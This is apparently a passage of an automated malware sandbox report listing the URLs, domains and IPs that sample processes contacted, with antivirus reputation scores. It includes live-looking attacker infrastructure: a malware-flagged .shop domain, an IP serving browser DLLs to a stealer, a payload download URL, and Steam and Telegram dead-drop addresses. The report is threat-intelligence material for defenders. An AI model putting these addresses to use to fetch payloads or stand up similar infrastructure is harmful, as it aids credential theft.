                https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi0%URL Reputationsafe
                https://login.steampowered.com/0%URL Reputationsafe
                https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                https://65.109.242.59/~0%Avira URL Cloudsafe
                https://support.mozilla.org/products/firefoxgro.all0%URL Reputationsafe
                https://store.steampowered.com/legal/0%URL Reputationsafe
                https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg0%URL Reputationsafe
                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark0%URL Reputationsafe
                https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A0%URL Reputationsafe
                https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV0%Avira URL Cloudsafe
                whispedwoodmoodsksl.shop100%Avira URL Cloudmalware
                http://guteyr.cc/tmp/index.php0%Avira URL Cloudsafe
                https://65.109.242.59/Z0%Avira URL Cloudsafe
                https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
                https://65.109.242.59/~0%VirustotalBrowse
                https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV0%VirustotalBrowse
                https://65.109.242.59/nss3.dll0%Avira URL Cloudsafe
                https://65.109.242.59/c0%Avira URL Cloudsafe
                https://duckduckgo.com/ac/?q=0%VirustotalBrowse
                https://65.109.242.59AKEH0%Avira URL Cloudsafe
                https://65.109.242.59/h0%Avira URL Cloudsafe
                https://65.109.242.59/Z14%VirustotalBrowse
                https://65.109.242.59/g0%Avira URL Cloudsafe
                whispedwoodmoodsksl.shop17%VirustotalBrowse
                https://s.ytimg.com;0%Avira URL Cloudsafe
                http://guteyr.cc/tmp/index.php13%VirustotalBrowse
                https://t.me/copterwin0%Avira URL Cloudsafe
                https://65.109.242.59/s0%Avira URL Cloudsafe
                https://65.109.242.59/h4%VirustotalBrowse
                https://65.109.242.59/g0%VirustotalBrowse
                https://65.109.242.59/q0%Avira URL Cloudsafe
                https://65.109.242.59/u0%Avira URL Cloudsafe
                https://65.109.242.59/B0%Avira URL Cloudsafe
                https://65.109.242.59/A0%Avira URL Cloudsafe
                https://65.109.242.59/s14%VirustotalBrowse
                https://t.me/copterwinr0isMozilla/5.00%Avira URL Cloudsafe
                https://65.109.242.59/c3%VirustotalBrowse
                https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&0%Avira URL Cloudsafe
                https://65.109.242.59/q14%VirustotalBrowse
                https://65.109.242.59/A0%VirustotalBrowse
                https://65.109.242.59/F0%Avira URL Cloudsafe
                https://65.109.242.59/B0%VirustotalBrowse
                https://t.me/copterwin1%VirustotalBrowse
                https://65.109.242.59/E0%Avira URL Cloudsafe
                https://65.109.242.59/L0%Avira URL Cloudsafe
                https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&0%VirustotalBrowse
                https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js0%Avira URL Cloudsafe
                https://65.109.242.59/F0%VirustotalBrowse
                https://65.109.242.59/u0%VirustotalBrowse
                https://65.109.242.59/L0%VirustotalBrowse
                https://t.me/copterwinr0isMozilla/5.00%VirustotalBrowse
                https://65.109.242.59/E0%VirustotalBrowse
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                whispedwoodmoodsksl.shop
                		188.114.96.3
                		truetrueunknown
                steamcommunity.com
                		23.199.218.33
                		truetrueunknown
                dbfhns.in
                		185.18.245.58
                		truetrueunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                whispedwoodmoodsksl.shoptrue
                • 17%, Virustotal, Browse
                • Avira URL Cloud: malware
                		unknown
                http://guteyr.cc/tmp/index.phptrue
                • 13%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://65.109.242.59/nss3.dllfalse
                • Avira URL Cloud: safe
                		unknown
                https://65.109.242.59/freebl3.dllfalse
                • Avira URL Cloud: safe
                		unknown
                http://45.129.96.86/file/update.exetrue
                • 20%, Virustotal, Browse
                • Avira URL Cloud: malware
                		unknown
                https://steamcommunity.com/profiles/76561199689717899true
                • 1%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://65.109.242.59/mozglue.dllfalse
                • Avira URL Cloud: safe
                		unknown
                https://65.109.242.59/vcruntime140.dllfalse
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://aka.ms/odirmrexplorer.exe, 00000001.00000000.1721748248.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://duckduckgo.com/chrome_newtab38F9.exe, 00000006.00000003.2032985420.0000000002CB7000.00000004.00000800.00020000.00000000.sdmp, 38F9.exe, 00000006.00000003.2033348282.0000000002CB7000.00000004.00000800.00020000.00000000.sdmp, 38F9.exe, 00000006.00000003.2032872593.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2483229226.0000000000A39000.00000004.00000020.00020000.00000000.sdmp, DAEBKK.11.drfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://duckduckgo.com/ac/?q=38F9.exe, 00000006.00000003.2032985420.0000000002CB7000.00000004.00000800.00020000.00000000.sdmp, 38F9.exe, 00000006.00000003.2033348282.0000000002CB7000.00000004.00000800.00020000.00000000.sdmp, 38F9.exe, 00000006.00000003.2032872593.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2483229226.0000000000A39000.00000004.00000020.00020000.00000000.sdmp, DAEBKK.11.drfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://65.109.242.59/~katB4C0.tmp, 0000000B.00000003.2367775910.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2352036330.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2399303935.00000000009AA000.00000004.00000020.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000001.00000000.1721748248.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcVkatB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000001.00000000.1721748248.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1723237920.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.katB4C0.tmp, 0000000B.00000002.2791549428.0000000000B04000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000002.2791549428.0000000000A3D000.00000004.00000020.00020000.00000000.sdmp, DHIEHI.11.drfalse
                • URL Reputation: safe
                		unknown
                https://www.gstatic.cn/recaptcha/katB4C0.tmp, 0000000B.00000003.2317523394.0000000000983000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=englikatB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drfalse
                • URL Reputation: safe
                		unknown
                https://simpleflying.com/how-do-you-become-an-air-traffic-controller/explorer.exe, 00000001.00000000.1721748248.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.valvesoftware.com/legal.htmkatB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.0000000000976000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drfalse
                • URL Reputation: safe
                		unknown
                https://www.youtube.comkatB4C0.tmp, 0000000B.00000003.2317523394.0000000000983000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://65.109.242.59/ZkatB4C0.tmp, 0000000B.00000003.2367775910.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2399303935.00000000009AA000.00000004.00000020.00020000.00000000.sdmpfalse
                • 14%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exekatB4C0.tmp, 0000000B.00000002.2788838595.000000000060B000.00000040.00000400.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 00000001.00000000.1721748248.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://65.109.242.59/ckatB4C0.tmp, 0000000B.00000003.2658098297.00000000009F7000.00000004.00000020.00020000.00000000.sdmpfalse
                • 3%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://65.109.242.59AKEHkatB4C0.tmp, 0000000B.00000002.2788838595.0000000000572000.00000040.00000400.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://65.109.242.59/hkatB4C0.tmp, 0000000B.00000003.2658098297.00000000009B3000.00000004.00000020.00020000.00000000.sdmpfalse
                • 4%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackkatB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drfalse
                • URL Reputation: safe
                		unknown
                https://65.109.242.59/gkatB4C0.tmp, 0000000B.00000003.2399303935.00000000009AA000.00000004.00000020.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://s.ytimg.com;katB4C0.tmp, 0000000B.00000003.2317523394.0000000000983000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://t.me/copterwinD818.exe, 0000000A.00000002.2305592154.0000000004270000.00000040.00001000.00020000.00000000.sdmp, D818.exe, 0000000A.00000002.2306037473.0000000004570000.00000004.00001000.00020000.00000000.sdmp, D818.exe, 0000000A.00000002.2305075541.0000000002560000.00000040.00001000.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000002.2788838595.0000000000422000.00000040.00000400.00020000.00000000.sdmpfalse
                • 1%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://65.109.242.59/skatB4C0.tmp, 0000000B.00000003.2512766694.00000000009F6000.00000004.00000020.00020000.00000000.sdmpfalse
                • 14%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://65.109.242.59/qkatB4C0.tmp, 0000000B.00000003.2658098297.00000000009F7000.00000004.00000020.00020000.00000000.sdmpfalse
                • 14%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94katB4C0.tmp, 0000000B.00000002.2791549428.0000000000B04000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000002.2791549428.0000000000A3D000.00000004.00000020.00020000.00000000.sdmp, DHIEHI.11.drfalse
                • URL Reputation: safe
                		unknown
                https://65.109.242.59/ukatB4C0.tmp, 0000000B.00000003.2367775910.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2352036330.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009A9000.00000004.00000020.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://wns.windows.com/Lexplorer.exe, 00000001.00000000.1725399899.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&amp;katB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drfalse
                • URL Reputation: safe
                		unknown
                https://65.109.242.59/CkatB4C0.tmp, 0000000B.00000003.2658098297.00000000009F7000.00000004.00000020.00020000.00000000.sdmpfalse
                  		unknown
                  https://65.109.242.59/BkatB4C0.tmp, 0000000B.00000003.2658098297.00000000009B3000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000001.00000000.1721748248.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://65.109.242.59/AkatB4C0.tmp, 0000000B.00000003.2399303935.0000000000993000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2471122571.00000000009F5000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 00000001.00000000.1721748248.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://t.me/copterwinr0isMozilla/5.0katB4C0.tmp, 0000000B.00000002.2788838595.0000000000422000.00000040.00000400.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&katB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://65.109.242.59/FkatB4C0.tmp, 0000000B.00000003.2658098297.00000000009F7000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://65.109.242.59/EkatB4C0.tmp, 0000000B.00000003.2399303935.0000000000993000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://65.109.242.59/LkatB4C0.tmp, 0000000B.00000003.2367775910.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2352036330.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2399303935.00000000009AA000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.jskatB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000001.00000000.1721748248.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=38F9.exe, 00000006.00000003.2032985420.0000000002CB7000.00000004.00000800.00020000.00000000.sdmp, 38F9.exe, 00000006.00000003.2033348282.0000000002CB7000.00000004.00000800.00020000.00000000.sdmp, 38F9.exe, 00000006.00000003.2032872593.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2483229226.0000000000A39000.00000004.00000020.00020000.00000000.sdmp, DAEBKK.11.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://whispedwoodmoodsksl.shop/apicC38F9.exe, 00000006.00000003.2119605689.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, 38F9.exe, 00000006.00000003.2120009035.00000000006B1000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctakatB4C0.tmp, 0000000B.00000002.2791549428.0000000000B04000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000002.2791549428.0000000000A3D000.00000004.00000020.00020000.00000000.sdmp, DHIEHI.11.drfalse
                  • URL Reputation: safe
                  		unknown
                  http://ocsp.rootca1.amazontrust.com0:38F9.exe, 00000006.00000003.2067870291.0000000002C92000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://65.109.242.59/MkatB4C0.tmp, 0000000B.00000003.2367775910.0000000000993000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 6%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://65.109.242.59/TkatB4C0.tmp, 0000000B.00000003.2658098297.00000000009F7000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.ecosia.org/newtab/38F9.exe, 00000006.00000003.2032985420.0000000002CB7000.00000004.00000800.00020000.00000000.sdmp, 38F9.exe, 00000006.00000003.2033348282.0000000002CB7000.00000004.00000800.00020000.00000000.sdmp, 38F9.exe, 00000006.00000003.2032872593.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2483229226.0000000000A39000.00000004.00000020.00020000.00000000.sdmp, DAEBKK.11.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000001.00000000.1721748248.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://lv.queniujq.cnkatB4C0.tmp, 0000000B.00000003.2317523394.0000000000983000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://www.youtube.com/katB4C0.tmp, 0000000B.00000003.2317523394.0000000000983000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://65.109.242.59/VkatB4C0.tmp, 0000000B.00000003.2459479355.00000000009F8000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngkatB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.0000000000976000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000001.00000000.1721748248.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000001.00000000.1721748248.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016katB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.0000000000976000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://65.109.242.59/(katB4C0.tmp, 0000000B.00000002.2791549428.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2367775910.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2352036330.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2658098297.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2399303935.00000000009AA000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 13%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.google.com/recaptcha/katB4C0.tmp, 0000000B.00000003.2317523394.0000000000983000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://65.109.242.59/&katB4C0.tmp, 0000000B.00000003.2367775910.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2352036330.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2399303935.00000000009AA000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://checkout.steampowered.com/katB4C0.tmp, 0000000B.00000003.2317523394.0000000000983000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28bkatB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.0000000000976000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.pngkatB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.0000000000976000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://outlook.com_explorer.exe, 00000001.00000000.1725399899.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples38F9.exe, 00000006.00000003.2032286413.0000000002CA0000.00000004.00000800.00020000.00000000.sdmp, KEGCBF.11.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://65.109.242.59/-katB4C0.tmp, 0000000B.00000003.2658098297.0000000000996000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://whispedwoodmoodsksl.shop/y38F9.exe, 00000006.00000003.2031885108.000000000064B000.00000004.00000020.00020000.00000000.sdmp, 38F9.exe, 00000006.00000003.2031961773.0000000000666000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  https://65.109.242.59/4katB4C0.tmp, 0000000B.00000003.2399303935.00000000009AA000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://65.109.242.59GDHJkatB4C0.tmp, 0000000B.00000002.2788838595.000000000052E000.00000040.00000400.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://65.109.242.59/2katB4C0.tmp, 0000000B.00000003.2459479355.00000000009F8000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000001.00000000.1721748248.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://65.109.242.59/09.242.59/katB4C0.tmp, 0000000B.00000003.2658098297.00000000009B3000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000001.00000000.1721748248.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://help.steampowered.com/en/katB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.0000000000976000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=katB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.0000000000976000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drfalse
                  • URL Reputation: safe
                  		unknown
                  http://schemas.microexplorer.exe, 00000001.00000000.1724106836.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1722399580.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1722761603.0000000008720000.00000002.00000001.00040000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://recaptcha.net/recaptcha/;katB4C0.tmp, 0000000B.00000003.2317523394.0000000000983000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://broadcast.st.dl.eccdnx.comkatB4C0.tmp, 0000000B.00000003.2317523394.0000000000983000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gifkatB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.0000000000976000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?vkatB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drfalse
                  • URL Reputation: safe
                  		unknown
                  http://x1.c.lencr.org/038F9.exe, 00000006.00000003.2067870291.0000000002C92000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://x1.i.lencr.org/038F9.exe, 00000006.00000003.2067870291.0000000002C92000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pkatB4C0.tmp, 0000000B.00000002.2788838595.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, katB4C0.tmp, 0000000B.00000003.2336765418.0000000000976000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.11.drfalse
